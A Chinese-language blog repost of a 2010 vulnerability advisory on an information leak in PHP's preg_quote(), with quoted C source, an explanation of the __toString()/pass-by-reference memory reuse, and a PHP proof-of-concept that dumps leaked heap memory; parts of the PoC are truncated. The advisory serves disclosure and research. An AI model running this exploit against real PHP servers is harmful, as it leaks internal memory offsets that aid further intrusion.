pregquote php,PHP preg_quote()中断信息泄露漏洞

最新推荐文章于 2021-03-31 23:31:17 发布
最新推荐文章于 2021-03-31 23:31:17 发布
阅读量104 收藏
点赞数
文章标签: pregquote php

发布日期:2010-05-07

更新日期:2010-05-10

受影响系统:

PHP PHP <= 5.3.2

PHP PHP <= 5.2.13

描述:

--------------------------------------------------------------------------------

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的preg_quote()函数中存在信息泄露漏洞:

static PHP_FUNCTION(preg_quote)

{

...

/* Get the arguments and check for errors */

if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|s", &in_str, &in_str_len,

&delim, &delim_len) == FAILURE) {

return;

}

in_str_end = in_str + in_str_len;

...

if (delim && *delim) {

delim_char = delim[0];

quote_delim = 1;

}

/* Allocate enough memory so that even if each character

is quoted, we won't run out of room */

out_str = safe_emalloc(4, in_str_len, 1);

/* Go through the string and quote necessary characters */

for(p = in_str, q = out_str; p != in_str_end; p++) {

c = *p;

switch(c) {

case '.':

...

case '-':

*q++ = '\';

*q++ = c;

break;

case '\0':

*q++ = '\';

*q++ = '0';

*q++ = '0';

*q++ = '0';

break;

default:

if (quote_delim && c == delim_char)

*q++ = '\';

*q++ = c;

break;

}

}

*q = '\0';

/* Reallocate string and return it */

RETVAL_STRINGL(erealloc(out_str, q - out_str + 1), q - out_str, 0);

zend_parse_parameters()函数将字符串指针、长度和ineger参数拷贝到了本地变量,放松了这些变量与原始ZVAL之间的联系。问题是任何对ZVAL的修改都不会反映在本地变量上,因此任何中断都可能修改ZVAL,导致本地变量指向已释放和重新使用的内存。此外由于zend_parse_parameters()支持对象的__toString()方式,只要以preg_quote()第三个参数的形式传送对象就可以中断参数解析。由于PHP的call time pass by reference功能,之后攻击者可以从__toString()方式杀死preg_quote()的第一个参数并重新用于哈希表。这导致preg_quote()作用于哈希表的内存而不是字符串的内存,攻击者可以泄露重要的内部内存偏移。

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

class dummy

{

function __toString()

{

/* now the magic */

parse_str("xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=1", $GLOBALS['var']);

return "";

}

}

/* Detect 32 vs 64 bit */

$i = 0x7fffffff;

$i++;

if (is_float($i)) {

$GLOBALS['var'] = str_repeat("A", 39);

} else {

$GLOBALS['var'] = str_repeat("A", 67);

}

/* Trigger the Code */

$x = stripcslashes(preg_quote(&$GLOBALS['var'], new dummy()));

hexdump($x);

/* Helper function */

function hexdump($x)

{

$l = strlen($x);

$p = 0;

echo "Hexdump\n";

echo "-------\n";

while ($l > 16) {

echo sprintf("%08x: ",$p);

for ($i=0; $i<16; $i++) {

echo sprintf("%02X ", ord($x[$p+$i]));

}

echo "  ";

for ($i=0; $i<16; $i++) {

$c = ord($x[$p+$i]);

echo ($c < 32 || $c > 127) ? '.' : chr($c);

}

$l-=16;

$p+=16;

echo "\n";

}

if ($l > 0)

echo sprintf("%08x: ",$p);

for ($i=0; $i

echo sprintf("%02X ", ord($x[$p+$i]));

}

for ($i=0; $i<16-$l; $i++) { echo "-- "; }

echo "  ";

for ($i=0; $i

$c = ord($x[$p+$i]);

echo ($c < 32 || $c > 127) ? '.' : chr($c);

}

echo "\n";

}

?>

建议:

--------------------------------------------------------------------------------

临时解决方法:

* 删除call time pass by reference功能。

厂商补丁:

PHP

---

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

0b1331709591d260c1c78e86d0c51c18.png

weixin_39901412
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php小经验:解析preg_match与preg_match_all 函数
12-19
Perl 兼容正则表达式(PCRE)函数是PHP中最常用的正则函数,例如`preg_match()`和`preg_match_all()`。 `preg_match()`函数用于执行单次正则匹配。它的基本语法是: ```php int preg_match(string pattern, string ...
php preg_match_all结合str_replace替换内容中所有img
10-30
PHP编程中,`preg_match_all` 和 `str_replace` 是两个非常重要的字符串处理函数,它们经常被用来处理HTML或XML文档中的特定内容。在这个场景中,开发者需要从采集的数据中提取并替换`<img>`标签,以符合站点的...
php正则表达式preg_quote,
_小明同学__
10-13 306
php正则表达式用到的几个函数preg_quote() 1 preg_quote() preg_quote() 以 str 为参数并给其中每个属于正则表达式语法的字符前面加上一个反斜线 function varname($varname) {     return preg_quote("{" . $varname . "}");   } 注:将$varname中属于
深度理解php的preg_quote()函数
weixin_43740552的博客
05-20 389
php手册上说,preg_quote()函数的作用是转义正则表达式字符,它一般是和preg_replace()函数一起使用。 作用: 在匹配的字符中有正则表达式字符的时候使用,作用是转义正则表达式字符(向正则表达式语法中的字符前增加一个反斜线,如very会被转义成*very*)。 如下例子,在需要匹配的字符very中,有特殊字符*,如果不转义,则无法正常匹配到very(程序会把当作正则符号),因此...
preg_quote
adf1256的博客
03-06 119
preg_quote转义正则表达式字符(向正则表达式语法中的字符前增加一个反斜线)(如下的例子中则是将*very*变成\*very\*),返回转义后的字符串。 $textbody = "This book is *very* difficult to find."; $word = "*very*"; $textbody = p...
pregquote php,PHP preg_quote() 函数
weixin_29774679的博客
03-18 111
PHP preg_quote() 函数preg_quote 函数用于转义正则表达式字符。语法string preg_quote ( string $str [, string $delimiter = NULL ] )preg_quote() 需要参数 str 并向其中 每个正则表达式语法中的字符前增加一个反斜线。 这通常用于你有一些运行时字符串 需要作为正则表达式进行匹配的时候。正则表达式特殊字...
PHP7正则表达式,preg_quote()
weixin_36429576的博客
03-10 192
preg_quote()(PHP 4, PHP 5, PHP 7)转义正则表达式字符说明preg_quote(string$str[,string$delimiter= NULL]):stringpreg_quote()需要参数$str并向其中每个正则表达式语法中的字符前增加一个反斜线。这通常用于你有一些运行时字符串需要作为正则表达式进行匹配的时候。正则表达式特殊字符有:. +* ?[ ^] $(...
php中使用preg_match_all匹配文章中的图片
12-19
`preg_match_all`函数是PHP中用于全局正则表达式匹配的关键函数,它可以在一个字符串中查找所有符合特定模式的匹配项,并将这些匹配项存储在一个数组中。下面我们将详细讨论`preg_match_all`函数的使用、参数以及...
php正则表达式 转义,PHP preg_quote():对正则表达式进行转义
weixin_34801390的博客
03-31 318
PHP preg_quote() 函数用来对正则表达式字符串进行转义,也就是在特殊字符前边增加一个反斜杠,其语法如下:string preg_quote ( string $str [, string $delimiter = NULL ] )参数说明:str:正则表达式字符串。delimiter:可选参数,额外增加的需要转义的字符。preg_quote() 函数会遍历字符串 str,在每个正则表...
PHP 深度理解preg_quote()函数
weixin_34150830的博客
05-17 142
php手册上说,preg_quote()函数的作用是转义正则表达式字符。那么下面我们来深入了解下这个函数是怎么使用的: 说明:preg_quote()函数常和preg_replace()函数一起使用。 作用: 在匹配的字符中有正则表达式字符的时候使用,作用是转义正则表达式字符(向正则表达式语法中的字符前增加一个反斜线)(如下的例子中则是将*very*变成\*very\*),返回转义后的字符串...
php quote(),PHP: preg_quote - Manual
weixin_42302872的博客
03-09 84
List of specials is incomplete:--- sample code ---$specials = '.\+*?[^]$(){}=!<>|:-';for ($i = 0; $i <= 255; $i++) {if (chr($i) !== preg_quote(chr($i))) {printf("Character 0x%02x quoted%s\n",...
php函数—preg_quote()转义正则表达式字符
不一样的焰火
06-06 760
(PHP 4, PHP 5) preg_quote — 转义正则表达式字符 string preg_quote ( string $str [, string $delimiter = NULL ] ) preg_quote()需要参数 str 并向其中 每个正则表达式语法中的字符前增加一个反斜线。 这通常用于你有一些运行时字符串 需要作为正则表达式进行匹配的
preg_quote() 函数
冷月醉雪的博客
04-21 220
查看更多 https://www.yuque.com/docs/share/3c7d9781-7ae2-4f99-9e9d-d76543dad99e
preg_quote — 转义正则表达式字符
一个今天胜过两个明天
03-16 194
说明 string preg_quote ( string $str [, string $delimiter = NULL ] ) preg_quote()需要参数 str 并向其中 每个正则表达式语法中的字符前增加一个反斜线。 这通常用于你有一些运行时字符串 需要作为正则表达式进行匹配的时候。 正则表达式特殊字符有: . \ + * ? [ ^ ] $ ( ) { } =...
(PHP)正则表达式-preg_quote-转义正则表达式字符的用法
保持对编程的热情!
11-15 1822
<?php /** * Created by PhpStorm. * User: Ollydebug * Date: 2015/11/15 * Time: 10:20 */ //preg_quote-转义正则表达式字符 //preg_quote()需要参数 str 并向其中 每个正则表达式语法中的字符前增加一个反斜线。这通常用于你有一些运行时字符串 需要作为正则表达式进行匹配的时候
php正则表达式及涉及函数
uglyfisher的博客
02-17 5550
元字符描述示例.匹配任意单个字符。正则表达式 a.c 可以匹配 aac,a2c,a#c 等$匹配字符串的结尾。正则表达式 abc$ 可以匹配最后以 abc 结尾的字符串^匹配字符串的开始。正则表达式 ^what 可以匹配以 what 开始的字符串*匹配 * 前面的子串零次或多次正则表达式 abc*d 可以匹配 abcd、aad、bd、bcd、d等字符串+匹配 * 前面的子串一次或多次正则表达式 a...
php正则中括号 转义,php正则表达式转义字符的例子
weixin_33940031的博客
03-12 262
php 中,实现转义正则表达式字符的函数是: preg_quote 函数。语法如下:string preg_quote(string str [, string delimiter])str 是用来进行字符转义的正则表达式, delimiter 是其他需要转义字符。在 php 中可以使用 preg_quote 函数转义一些特殊字符。例1:复制代码 代码示例:$str = preg_quote(...
PHP preg_replace与preg_replace_callback深度解析及其应用场景
PHP正则替换函数`preg_replace`和`preg_replace_callback`在模板引擎开发中起着关键作用,尤其是在处理字符串替换和条件判断时。`preg_replace`通常用于全局搜索并替换符合正则表达式的字符串,而`preg_replace_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值